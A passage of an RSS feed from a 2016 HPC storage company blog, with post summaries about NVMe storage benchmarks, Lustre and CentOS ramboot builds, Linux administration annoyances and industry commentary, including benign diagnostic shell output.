      <description>So there are some macros, __DATE__ and __TIME__, that the gcc compiler knows about. And some people inject these into their kernel module builds, because, well, why not. The issue is that they can make &amp;ldquo;reproducible builds&amp;rdquo; harder. Well, no, they really don&amp;rsquo;t. That&amp;rsquo;s a side issue. And of course, modern kernel builds use -Wall -Werror which converts warnings like macro &amp;quot;__TIME__&amp;quot; might prevent reproducible builds [-Werror=date-time] into real honest-to-goodness errors.</description>
    </item>
    
    <item>
      <title>Talk from #Kxcon2016 on #HPC #Storage for #BigData analytics is up</title>
      <link>https://blog.scalability.org/2016/05/talk-from-kxcon2016-on-hpc-storage-for-bigdata-analytics-is-up/</link>
      <pubDate>Tue, 24 May 2016 17:32:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/talk-from-kxcon2016-on-hpc-storage-for-bigdata-analytics-is-up/</guid>
      <description>See here, which was largely about how to architect high performance analytics platforms, and a specific shout out to our Forte NVMe flash unit, which is currently available in volume starting at $1 USD/GB. Some of the more interesting results from our testing:
 * 24GB/s bandwidth largely insensitive to block size.
 * 5+ Million IOPs random IO (5+MIOPs) sensitive to block size.
 * 4k random read (100%) were well north of 5M IOPs.</description>
    </item>
    
    <item>
      <title>Going to #KXcon2016  this weekend to talk #NVMe #HPC #Storage for #kdb #iot and #BigData</title>
      <link>https://blog.scalability.org/2016/05/going-to-kxcon2016-this-weekend-to-talk-nvme-hpc-storage-for-kdb-iot-and-bigdata/</link>
      <pubDate>Wed, 18 May 2016 23:00:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/going-to-kxcon2016-this-weekend-to-talk-nvme-hpc-storage-for-kdb-iot-and-bigdata/</guid>
      <description>This should be fun! This is being organized and run by my friend Lara of Xand Marketing. Excellent talks scheduled, fun bits (raspberry pi based kdb+!!!). Some similarities with the talk I gave this morning, but more of a focus on specific analytics issues relevant for people with massive time series data sets and a need to analyze them. Looking forward to getting out to Montauk &amp;hellip; haven&amp;rsquo;t been there since I did my undergrad at Stony Brook.</description>
    </item>
    
    <item>
      <title>Gave a talk today at #BeeGFS User Meeting 2016 in Germany on #NVMe #HPC #Storage</title>
      <link>https://blog.scalability.org/2016/05/gave-a-talk-today-at-beegfs-user-meeting-2016-in-germany-on-nvme-hpc-storage/</link>
      <pubDate>Wed, 18 May 2016 20:31:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/gave-a-talk-today-at-beegfs-user-meeting-2016-in-germany-on-nvme-hpc-storage/</guid>
      <description>&amp;hellip; through the magic of Google Hangouts. I think they will be posting the talk soon, but you are welcome to view the PDF here.</description>
    </item>
    
    <item>
      <title>Success with rambooted Lustre  v2.8.53 for #HPC #storage</title>
      <link>https://blog.scalability.org/2016/05/success-with-rambooted-lustre-v2-8-53-for-hpc-storage/</link>
      <pubDate>Wed, 11 May 2016 17:42:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/success-with-rambooted-lustre-v2-8-53-for-hpc-storage/</guid>
      <description>[root@usn-ramboot ~]# uname -r
3.10.0-327.13.1.el7_lustre.x86_64
[root@usn-ramboot ~]# df -h /
Filesystem      Size  Used Avail Use% Mounted on
tmpfs           8.0G  4.3G  3.8G  53% /
[root@usn-ramboot ~]# rpm -qa | grep lustre
kernel-3.10.0-327.13.1.el7_lustre.x86_64
kernel-tools-3.10.0-327.13.1.el7_lustre.x86_64
kernel-devel-3.10.0-327.13.1.el7_lustre.x86_64
lustre-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64
kernel-tools-libs-devel-3.10.0-327.13.1.el7_lustre.x86_64
lustre-osd-ldiskfs-mount-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64
kernel-headers-3.10.0-327.13.1.el7_lustre.x86_64
lustre-osd-ldiskfs-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64
kernel-tools-libs-3.10.0-327.13.1.el7_lustre.x86_64
lustre-modules-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64

This means that we can run Lustre 2.8.x atop Unison. Still pre-alpha, as I have to get an updated kernel into this, as well as update all the drivers.</description>
    </item>
    
    <item>
      <title>Its not perfect, but we have CentOS/RHEL 7.2 and Lustre integrated into SIOS now</title>
      <link>https://blog.scalability.org/2016/05/its-not-perfect-but-we-have-centosrhel-7-2-and-lustre-integrated-into-sios-now/</link>
      <pubDate>Mon, 09 May 2016 17:48:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/its-not-perfect-but-we-have-centosrhel-7-2-and-lustre-integrated-into-sios-now/</guid>
      <description>Lustre is infamous for its kernel specificity, and it is, sadly, quite problematic to get running on a modern kernel (3.18+). This has implications for quite a large number of things, including whole subsystems with a partial back-porting to earlier kernels &amp;hellip; which quite often misses very critical bits for stability/performance. I am not a fan of back porting for features, I am a fan of updating kernels for features. But that is another issue that I&amp;rsquo;ve talked about in the past.</description>
    </item>
    
    <item>
      <title>reason #31659275 not to use java</title>
      <link>https://blog.scalability.org/2016/05/reason-31659275-not-to-use-java/</link>
      <pubDate>Mon, 09 May 2016 13:11:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/reason-31659275-not-to-use-java/</guid>
      <description>As seen on hacker news linking to an Arstechnica article, this little tidbit. This is the money quote:
I know it seems obvious now to Google and to others, but mebbe &amp;hellip; mebbe &amp;hellip; they should rethink building a platform in a non-open language? I&amp;rsquo;ve talked about OSS type systems in terms of business risk for well more than a decade. OSS software intrinsically changes the risk model, so that you do not have a built in dependency upon another stack that could go away at any moment.</description>
    </item>
    
    <item>
      <title>isn&#39;t this the definition of a Ponzi scheme?</title>
      <link>https://blog.scalability.org/2016/05/isnt-this-the-definition-of-a-ponzi-scheme/</link>
      <pubDate>Mon, 02 May 2016 14:06:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/05/isnt-this-the-definition-of-a-ponzi-scheme/</guid>
      <description>From this article at the WSJ detailing the deflation of the tech bubble in progress now.
A Ponzi scheme is like this:</description>
    </item>
    
    <item>
      <title>Every now and then you get an eye opener</title>
      <link>https://blog.scalability.org/2016/04/every-now-and-then-you-get-an-eye-opener/</link>
      <pubDate>Thu, 28 Apr 2016 20:21:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/every-now-and-then-you-get-an-eye-opener/</guid>
      <description>This one is while we are conditioning a Forte NVMe unit, and I am running our OS install scripts. Running dstat in a window to watch the overall system &amp;hellip;
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
usr sys idl wai hiq siq| read  writ| recv  send|  in   out | int   csw
  2   5  94   0   0   0|   0    22G| 218B  484B|   0     0 | 363k  368k
  1   4  94   0   0   0|   0    22G| 486B  632B|   0     0 | 362k  367k
  1   4  94   0   0   0|   0    22G| 628B  698B|   0     0 | 363k  368k
  2   5  92   1   0   0| 536k  110G| 802B 2024B|   0     0 | 421k  375k
  1   4  93   2   0   0|   0    22G| 360B  876B|   0     0 | 447k  377k

Wait &amp;hellip; is that 110GB/s (2nd line from bottom, in the writ column)?</description>
    </item>
    
    <item>
      <title>new SIOS feature: compressed ram image for OS</title>
      <link>https://blog.scalability.org/2016/04/new-sios-feature-compressed-ram-image-for-os/</link>
      <pubDate>Wed, 27 Apr 2016 19:22:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/new-sios-feature-compressed-ram-image-for-os/</guid>
      <description>Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things &amp;hellip; not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes &amp;ldquo;invalid&amp;rdquo; and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.</description>
    </item>
    
    <item>
      <title>there are times</title>
      <link>https://blog.scalability.org/2016/04/there-are-times-2/</link>
      <pubDate>Wed, 20 Apr 2016 21:37:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/there-are-times-2/</guid>
      <description>that try my patience. Usually with poorly implemented filtering tools of one form or another. The SPF mechanism is to provide an anti-spoofing system, which identifies which machines are allowed to send email in your domain name. The tools that purport to test it? Not so good. I get conflicting answers from various tools for a simple SPF record. The online tester (interactive) seems to work and show me my config is working nicely.</description>
    </item>
    
    <item>
      <title>Of course, this means more work ahead</title>
      <link>https://blog.scalability.org/2016/04/of-course-this-means-more-work-ahead/</link>
      <pubDate>Wed, 20 Apr 2016 04:05:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/of-course-this-means-more-work-ahead/</guid>
      <description>Our client code that pulls configuration bits from a boot server works great. But the config it pulls is distribution specific. Where we need to be is distribution/OS agnostic, and set things in a document database. Let the client convert the configuration into something OS specific. This is, to a degree, a solved problem. Indeed, etcd is just a modern reworking of what we did with the client code &amp;hellip; using a fixed client (e.</description>
    </item>
    
    <item>
      <title>Very preliminary RHEL7/CentOS7 SIOS base support</title>
      <link>https://blog.scalability.org/2016/04/very-preliminary-rhel7centos7-sios-base-support/</link>
      <pubDate>Tue, 19 Apr 2016 19:21:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/very-preliminary-rhel7centos7-sios-base-support/</guid>
      <description>This is rebasing our SIOS tech atop RHEL7/CentOS7. Very early stage, pre-alpha, lots of debugger windows open &amp;hellip; but &amp;hellip;
[root@usn-ramboot ~]# cat /etc/redhat-release
CentOS Linux release 7.2.1511 (Core)
[root@usn-ramboot ~]# uname -r
4.4.6.scalable
[root@usn-ramboot ~]# df -h /
Filesystem      Size  Used Avail Use% Mounted on
tmpfs           8.0G  4.7G  3.4G  59% /

Dracut is giving me a few fits, but I&amp;rsquo;ve finished that side for the most part, and am now into debugging the post-pivot environment.</description>
    </item>
    
    <item>
      <title>Best practice or random rule ... diagnosing problems and running into annoyances</title>
      <link>https://blog.scalability.org/2016/04/best-practice-or-random-rule-diagnosing-problems-and-running-into-annoyances/</link>
      <pubDate>Mon, 18 Apr 2016 21:53:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/best-practice-or-random-rule-diagnosing-problems-and-running-into-annoyances/</guid>
      <description>As often as not, I&amp;rsquo;ll hear someone talk about a &amp;ldquo;best practice&amp;rdquo; that they are implementing or have implemented. Things that run counter to these &amp;ldquo;best practices&amp;rdquo; are obviously, by definition, &amp;ldquo;not best&amp;rdquo;. What I find sometimes amusing, often alarming, is that the &amp;ldquo;best practices&amp;rdquo; are often disconnected from reality in specific ways. This is not a bash on all best practices, some of them are sane, and real. Like not allowing plain text passwords for logins.</description>
    </item>
    
    <item>
      <title>Attempting, and to some degree, failing, to prevent a user from accruing technical debt</title>
      <link>https://blog.scalability.org/2016/04/attempting-and-to-some-degree-failing-to-prevent-a-user-from-accruing-technical-debt/</link>
      <pubDate>Thu, 07 Apr 2016 14:23:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/attempting-and-to-some-degree-failing-to-prevent-a-user-from-accruing-technical-debt/</guid>
      <description>We strive to do right by our customers. Sometimes this involves telling them unpleasant truths about choices they are going to make in the future, or have made in the past. I try not to overly sugar coat things &amp;hellip; I won&amp;rsquo;t be judgemental &amp;hellip; but I will be frank, and sometimes, this doesn&amp;rsquo;t go over well. During these discussions, I often see people insisting that their goal is X, but the steps Y to get there, will lead them to Z, which is not coincident with X.</description>
    </item>
    
    <item>
      <title>When spam bots attack</title>
      <link>https://blog.scalability.org/2016/04/when-spam-bots-attack/</link>
      <pubDate>Tue, 05 Apr 2016 23:34:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/when-spam-bots-attack/</guid>
      <description>I&amp;rsquo;ve been fixing up a few mail servers to be more discriminating over their connections. And I&amp;rsquo;ve noted that I didn&amp;rsquo;t have any automated tooling to block the spammers. I have lots of tooling to filter and control things. So I wrote a quick log -&amp;gt; ban list generator. Not perfect, but it seems to work nicely. Like I don&amp;rsquo;t have enough to do this week. /sigh Meetings tomorrow starting at 8am.</description>
    </item>
    
    <item>
      <title>Why sticking with distro packages can be (very) bad for your security</title>
      <link>https://blog.scalability.org/2016/04/why-sticking-with-distro-packages-can-be-very-bad-for-your-security/</link>
      <pubDate>Mon, 04 Apr 2016 04:59:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/why-sticking-with-distro-packages-can-be-very-bad-for-your-security/</guid>
      <description>I&amp;rsquo;ve been keeping a variety of systems up to date, updating security and other bits with zealous fervor. Security is never far from my mind, as I&amp;rsquo;ve watched bad practices being used at customers resulting in any number of things &amp;hellip; from minor probes, through (in one case, via a grad student impacted by a windows key logger) taking down a linux cluster, but not before knocking the university temporarily off the internet.</description>
    </item>
    
    <item>
      <title>Not-so-modern file system errors in modern file systems</title>
      <link>https://blog.scalability.org/2016/04/not-so-modern-file-system-errors-in-modern-file-systems/</link>
      <pubDate>Fri, 01 Apr 2016 15:24:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/04/not-so-modern-file-system-errors-in-modern-file-systems/</guid>
      <description>On a system in heavy production use, using an underlying file system for metadata service, we see this:
kernel: EXT4-fs warning: ext4_dx_add_entry:1992: Directory index full!
Ok, where does this come from? Ext3 had a limit of 32000 directory entries per directory, unless you turned on the dir_index feature. Ext4 theoretically has no limit. Well, it&amp;rsquo;s 64000 if you don&amp;rsquo;t use dir_index. Which we do use. Really the feature you want is dir_nlink.</description>
    </item>
    
    <item>
      <title>SIOS-metrics being updated soon with our process table sampler</title>
      <link>https://blog.scalability.org/2016/03/sios-metrics-being-updated-soon-with-our-process-table-sampler/</link>
      <pubDate>Fri, 01 Apr 2016 01:17:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/sios-metrics-being-updated-soon-with-our-process-table-sampler/</guid>
      <description>I needed to look at processes on the machine I&amp;rsquo;d been spending time debugging, in terms of what was running, what state it was in, the allocations, the IO, etc. Something was causing a hard panic, and it seemed correlated with an application issue. I didn&amp;rsquo;t have a process space sampler, so I wrote one. It takes one sample per second right now (configurable) across the whole process space, and uses about 1% CPU normally.</description>
    </item>
    
    <item>
      <title>Caught a not-so-cool bug in a hypervisor running on a production machine</title>
      <link>https://blog.scalability.org/2016/03/caught-a-not-so-cool-bug-in-a-hypervisor-running-on-a-production-machine/</link>
      <pubDate>Fri, 01 Apr 2016 00:59:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/caught-a-not-so-cool-bug-in-a-hypervisor-running-on-a-production-machine/</guid>
      <description>Not naming names. It&amp;rsquo;s a good product. It just gives up the ghost when you request 1.5x available memory, and the OS actually tries &amp;hellip; tries &amp;hellip; to fulfill the request. I thought I had set the maximum oversubscription amount to 85% of swap + physical. Yet along came a nice spike and WHAMMO. Down the machine went. That this was a high visibility production machine, with hard uptime requirements &amp;hellip; not so good.</description>
    </item>
    
    <item>
      <title>Sadly we can&#39;t afford the time or people to go to BioIT world expo next week</title>
      <link>https://blog.scalability.org/2016/03/sadly-we-cant-afford-the-time-or-people-to-go-to-bioit-world-expo-next-week/</link>
      <pubDate>Fri, 01 Apr 2016 00:53:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/sadly-we-cant-afford-the-time-or-people-to-go-to-bioit-world-expo-next-week/</guid>
      <description>Short handed + lots of very near term projects + many things that demand our attention == us pulling out. I wish it was otherwise, but we have limited people bandwidth, and I can&amp;rsquo;t afford 2 days doing booth duty while we have hard deliverables. /sigh Maybe 2017. We&amp;rsquo;ll see. And no, even though HPC on Wall Street is the same time, we aren&amp;rsquo;t going to that either. I like the show, but same issue with timing/people/projects.</description>
    </item>
    
    <item>
      <title>&#34;No, really, we are different than all the others you worked with&#34;</title>
      <link>https://blog.scalability.org/2016/03/no-really-we-are-different-than-all-the-others-you-worked-with/</link>
      <pubDate>Thu, 31 Mar 2016 15:58:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/no-really-we-are-different-than-all-the-others-you-worked-with/</guid>
      <description>Thus ended the plaintive cry of a management consultancy hawking its wares, promising us high level meetings with &amp;ldquo;customers&amp;rdquo; with &amp;ldquo;budgets&amp;rdquo; in our space. This isn&amp;rsquo;t to say we don&amp;rsquo;t want more customers; we do. We always need more (and repeat) customers &amp;hellip; this is the nature of our business. What we don&amp;rsquo;t need is pay-for-play. There is no shared risk, no incentive for the management consultant to deliver a set of business, as they are being paid either way; the pay-for-play is their business.</description>
    </item>
    
    <item>
      <title>It is 2016 ... why am I fighting with LDAP authentication in linux?  Why doesn&#39;t it just work?</title>
      <link>https://blog.scalability.org/2016/03/it-is-2016-why-am-i-fighting-with-ldap-authentication-in-linux-why-doesnt-it-just-work/</link>
      <pubDate>Wed, 30 Mar 2016 14:26:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/it-is-2016-why-am-i-fighting-with-ldap-authentication-in-linux-why-doesnt-it-just-work/</guid>
      <description>Ok &amp;hellip; very long story that boils down to us trying to help a customer out. I am trying to avoid the &amp;ldquo;let&amp;rsquo;s just add another user to /etc/passwd&amp;rdquo; or similar such thing. And they aren&amp;rsquo;t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use LDAP. I&amp;rsquo;ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.</description>
    </item>
    
    <item>
      <title>Ways to not reach me</title>
      <link>https://blog.scalability.org/2016/03/ways-to-not-reach-me/</link>
      <pubDate>Wed, 30 Mar 2016 13:39:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/ways-to-not-reach-me/</guid>
      <description>I&amp;rsquo;ve implemented a very strict policy for inbound phone calls. If I don&amp;rsquo;t recognize the number, it goes to voicemail. If it&amp;rsquo;s important enough to call me, it&amp;rsquo;s important enough to leave me a message. If a call comes in with an unknown number, I won&amp;rsquo;t answer it; it can go through to voicemail. If it comes through with a restricted number, it only goes through to voicemail, though I am starting to think that such calls should be automatically blocked (as in never even given the opportunity to go to voicemail).</description>
    </item>
    
    <item>
      <title>Spent the day fighting with a database that did not honor &#34;be liberal in what you accept&#34;</title>
      <link>https://blog.scalability.org/2016/03/spent-the-day-fighting-with-a-database-that-did-not-honor-be-liberal-in-what-you-accept/</link>
      <pubDate>Mon, 28 Mar 2016 20:50:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/spent-the-day-fighting-with-a-database-that-did-not-honor-be-liberal-in-what-you-accept/</guid>
      <description>To put it bluntly, its escaping not only doesn&amp;rsquo;t match its docs, but appears to be internally inconsistent. I kept getting errors that Google couldn&amp;rsquo;t really find much on, other than to suggest they were fixed bugs. I might have something to say on that. Looking forward to the next phase of this work, where we skip this db and focus on kdb+.</description>
    </item>
    
    <item>
      <title>The joys of automated tooling ... or ... catching changes in upstream projects workflows by errors in yours</title>
      <link>https://blog.scalability.org/2016/03/the-joys-of-automated-tooling-or-catching-changes-in-upstream-projects-workflows-by-errors-in-yours/</link>
      <pubDate>Sun, 20 Mar 2016 23:03:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/the-joys-of-automated-tooling-or-catching-changes-in-upstream-projects-workflows-by-errors-in-yours/</guid>
      <description>We have an automated build process for our boot images. It is actually quite good, allowing us to easily integrate many different capabilities with it. These capabilities are usually encapsulated in various software stacks that provide specific functionality. Most of these stacks follow pretty well defined workflows. For a number of reasons, we find building from source generally easier than package installation, as there are often some, well, effectively random (and often poor) choices in build options/file placement in the package builds.</description>
    </item>
    
    <item>
      <title>Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage</title>
      <link>https://blog.scalability.org/2016/03/not-even-breaking-a-sweat-10gbs-write-to-single-node-forte-unit-over-100gb-net-realhyperconverged-hpc-storage/</link>
      <pubDate>Tue, 15 Mar 2016 17:54:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/not-even-breaking-a-sweat-10gbs-write-to-single-node-forte-unit-over-100gb-net-realhyperconverged-hpc-storage/</guid>
      <description>TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system &amp;hellip;</description>
    </item>
    
    <item>
      <title>VC landscape changing:   Intel Capital on the market</title>
      <link>https://blog.scalability.org/2016/03/vc-landscape-changing-intel-capital-on-the-market/</link>
      <pubDate>Mon, 14 Mar 2016 02:38:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/vc-landscape-changing-intel-capital-on-the-market/</guid>
      <description>Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They&amp;rsquo;ve been in the thick of many interesting companies, though usually outside of Intel&amp;rsquo;s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups &amp;hellip; new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.</description>
    </item>
    
    <item>
      <title>Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!</title>
      <link>https://blog.scalability.org/2016/03/massive-unapologetic-storage-firepower-part-4-on-the-test-track-with-a-forte-unit-vaaaaroooooommmmmmm/</link>
      <pubDate>Sun, 13 Mar 2016 18:28:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/massive-unapologetic-storage-firepower-part-4-on-the-test-track-with-a-forte-unit-vaaaaroooooommmmmmm/</guid>
      <description>I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.</description>
    </item>
    
    <item>
      <title>Just another day, debugging someone&#39;s installer</title>
      <link>https://blog.scalability.org/2016/03/just-another-day-debugging-someones-installer/</link>
      <pubDate>Fri, 11 Mar 2016 15:38:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/just-another-day-debugging-someones-installer/</guid>
      <description>I like the installers that attempt (and then fail) to calculate what they need, and generate installation target names programmatically. I know &amp;hellip; I know &amp;hellip; it&amp;rsquo;s an attempt to reduce the level of pain for some folks, as the algorithm works for some sets of inputs. But not mine. And mine are valid. What we need is an &amp;ndash;I_know_what_the_heck_I_am_asking_for_so_please_just_do_the_install switch. Failing that, I have their installer (thankfully non-terrible perl code) up in an editor to see if I can find the offensive part, and then I can patch it (and send them the patch).</description>
    </item>
    
    <item>
      <title>What a difference a CEO makes</title>
      <link>https://blog.scalability.org/2016/03/what-a-difference-a-ceo-makes/</link>
      <pubDate>Mon, 07 Mar 2016 21:14:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/what-a-difference-a-ceo-makes/</guid>
      <description>So Microsoft will be starting to produce Linux software. This would never have happened under the previous CEO. With this change, Microsoft&amp;rsquo;s addressable market just grew fairly significantly for this product. Of course, there are ways for them to mess this up. Such as if they have features only available under windows. That would rather permanently consign this product to the dustbin of history. This said, I am hopeful that this CEO gets it, and will make sure that the changes Microsoft needs to make, are, in fact, made.</description>
    </item>
    
    <item>
      <title>One of those days where you search for information on a problem</title>
      <link>https://blog.scalability.org/2016/03/one-of-those-days-where-you-search-for-information-on-a-problem/</link>
      <pubDate>Thu, 03 Mar 2016 21:21:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/one-of-those-days-where-you-search-for-information-on-a-problem/</guid>
      <description>and find a post you wrote to a mailing list almost half a decade ago about that very problem &amp;hellip; and that it still hasn&amp;rsquo;t been fixed. This is a little sad.</description>
    </item>
    
    <item>
      <title>Fixed the asymmetric problem by moving to a different switch/network</title>
      <link>https://blog.scalability.org/2016/03/fixed-the-asymmetric-problem-by-moving-to-a-different-switchnetwork/</link>
      <pubDate>Wed, 02 Mar 2016 05:47:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/03/fixed-the-asymmetric-problem-by-moving-to-a-different-switchnetwork/</guid>
      <description>Long story, but it was a time sensitive POC bug. I like the switch I was using, but we needed this up ASAP. The customer was waiting. So I yanked all the 40GbE cards from the servers, put in multiport 10GbE, and set up 802.3ad LAGs. Then I moved to the Arista in the lab (great switch BTW). It&amp;rsquo;s been years since I set one up, so out came the manual. Read up on setting up the LAGs and port channels &amp;hellip; I had forgotten why I liked using them so much.</description>
    </item>
    
    <item>
      <title>Cool asymmetric network performance happened to mess up a customer benchmark</title>
      <link>https://blog.scalability.org/2016/02/cool-asymmetric-network-performance-happened-to-mess-up-a-customer-benchmark/</link>
      <pubDate>Mon, 29 Feb 2016 04:52:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/cool-asymmetric-network-performance-happened-to-mess-up-a-customer-benchmark/</guid>
      <description>A bunch of Unison systems, a 40GbE network interconnecting them, and a bunch of client nodes on 40GbE -&amp;gt; 4x 10GbE links (to accommodate enough clients for the load testing). 40GbE &amp;lt;-&amp;gt; 40GbE works great. Full bandwidth, only minor oddities (single thread performance around 27Gb/s; need multiple threads to hit 40). 10GbE &amp;lt;-&amp;gt; 10GbE works great. Full bandwidth, nothing odd. 10GbE -&amp;gt; 40GbE works great, at about the expected bandwidth (10GbE).</description>
    </item>
    
    <item>
      <title>Interesting ... so will they be sued for patents</title>
      <link>https://blog.scalability.org/2016/02/interesting-so-will-they-be-sued-for-patents/</link>
      <pubDate>Thu, 18 Feb 2016 20:46:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/interesting-so-will-they-be-sued-for-patents/</guid>
      <description>Turns out the next Ubuntu is baking ZFS into the kernel and distributing it. This seems directly contrary to the licensing (CDDL vs GPL), and chances are some folks will be unhappy with it. The big question is: will the IP holders sue? Because if they don&amp;rsquo;t, they may actually have given up their right to sue. Or has Canonical obtained a license to distribute? This is my understanding as I am not a lawyer, so I can&amp;rsquo;t really be sure of this (and I&amp;rsquo;d recommend you ask one if you are not sure).</description>
    </item>
    
    <item>
      <title>New tool to help visualize /proc/interrupts and info in /proc/irq/$INT/</title>
      <link>https://blog.scalability.org/2016/02/new-tool-to-help-visualize-procinterrupts-and-info-in-procirqint/</link>
      <pubDate>Wed, 03 Feb 2016 20:39:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/new-tool-to-help-visualize-procinterrupts-and-info-in-procirqint/</guid>
      <description>This is a start, not ready for release yet, but already useful as a diagnostic tool. I wanted to see how my IRQs were laid out, as this has been something of a persistent problem. I&amp;rsquo;ve built some intelligence into our irqassign.pl tool, but I need a way to see where the system is investing most of its interrupts. I omit (on purpose) IRQs that have been assigned, but have generated no interrupts.</description>
    </item>
    
    <item>
      <title>Not sufficiently caffeinated for technical work today</title>
      <link>https://blog.scalability.org/2016/02/not-sufficiently-caffeinated-for-technical-work-today/</link>
      <pubDate>Tue, 02 Feb 2016 16:16:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/not-sufficiently-caffeinated-for-technical-work-today/</guid>
      <description>I just spent 30 minutes trying to figure out why the 32 bit q process would run on one machine, while the identical tree and config would fail with a license expired on my desktop (development box). Turns out one should check for an old license file in one&amp;rsquo;s home directory. /sigh I think I need to send an RFE for an &amp;lsquo;&amp;ndash;low-coffee-mode&amp;rsquo; option.</description>
    </item>
    
    <item>
      <title>Not a fan of device mapper in Linux</title>
      <link>https://blog.scalability.org/2016/02/not-a-fan-of-device-mapper-in-linux/</link>
      <pubDate>Mon, 01 Feb 2016 18:10:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/02/not-a-fan-of-device-mapper-in-linux/</guid>
      <description>Yeah, I know. It brings all manner of capabilities with it. It&amp;rsquo;s just the cost of these capabilities, when combined with other tools (like, say, Docker), that makes me not want to use it. To wit:
root@ucp-01:~# ls -alF /var/lib/docker/devicemapper/devicemapper/
total 52508
drwx------ 2 root root           80 Jan 29 22:38 ./
drwx------ 4 root root           80 Jan 29 22:38 ../
-rw------- 1 root root 107374182400 Jan 29 22:39 data
-rw------- 1 root root   2147483648 Jan 29 22:39 metadata
root@ucp-01:~# ls -halF /var/lib/docker/devicemapper/devicemapper/
total 52M
drwx------ 2 root root 80 Jan 29 22:38 .</description>
    </item>
    
    <item>
      <title>Radio Free HPC is (as usual) worth a listen</title>
      <link>https://blog.scalability.org/2016/01/radio-free-hpc-is-as-usual-worth-a-listen/</link>
      <pubDate>Fri, 29 Jan 2016 03:42:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/radio-free-hpc-is-as-usual-worth-a-listen/</guid>
      <description>Good wrap up of last year&amp;rsquo;s trends this week at the InsideHPC Radio Free HPC podcast. We get a small mention around 10:50 or so. That&amp;rsquo;s not why it&amp;rsquo;s an especially good listen. The team arrived at many of the same conclusions we did last year, which is why we brought out Forte, and we have some additional products planned in that line for later in the year. Basically NVM and variants, NVMe, etc.</description>
    </item>
    
    <item>
      <title>When infinite resources aren&#39;t, and why software assumes they are infinite</title>
      <link>https://blog.scalability.org/2016/01/when-infinite-resources-arent-and-why-software-assumes-they-are-infinite/</link>
      <pubDate>Wed, 27 Jan 2016 18:48:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/when-infinite-resources-arent-and-why-software-assumes-they-are-infinite/</guid>
